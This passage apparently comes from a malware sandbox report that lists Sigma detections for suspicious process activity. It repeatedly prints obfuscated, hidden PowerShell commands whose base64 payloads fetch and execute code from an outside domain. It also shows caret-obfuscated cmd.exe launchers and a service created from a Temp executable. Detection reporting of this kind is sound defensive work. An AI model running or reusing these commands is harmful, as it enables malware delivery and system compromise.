JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
        Sigma detected: Suspicious New Service Creation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6444, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 5504, ProcessName: sc.exe
        Sigma detected: Suspicious PowerShell Encoded Command Patterns
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
        Sigma detected: Suspicious PowerShell Parameter Substring
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine|base64offset|contains: >E(^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4484, ParentProcessName: cmd.exe, ProcessCommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , ProcessId: 1276, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine|base64offset|contains: >E(^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4484, ParentProcessName: cmd.exe, ProcessCommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , ProcessId: 1276, ProcessName: powershell.exe
        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline", ProcessId: 2636, ProcessName: csc.exe
        Sigma detected: Suspicious Execution of Powershell with Base64
        Source: Process startedAuthor: frack113: Data: Command: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine|base64offset|contains: >E(^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4484, ParentProcessName: cmd.exe, ProcessCommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , ProcessId: 1276, ProcessName: powershell.exe
        Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine|base64offset|contains: >E(^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go 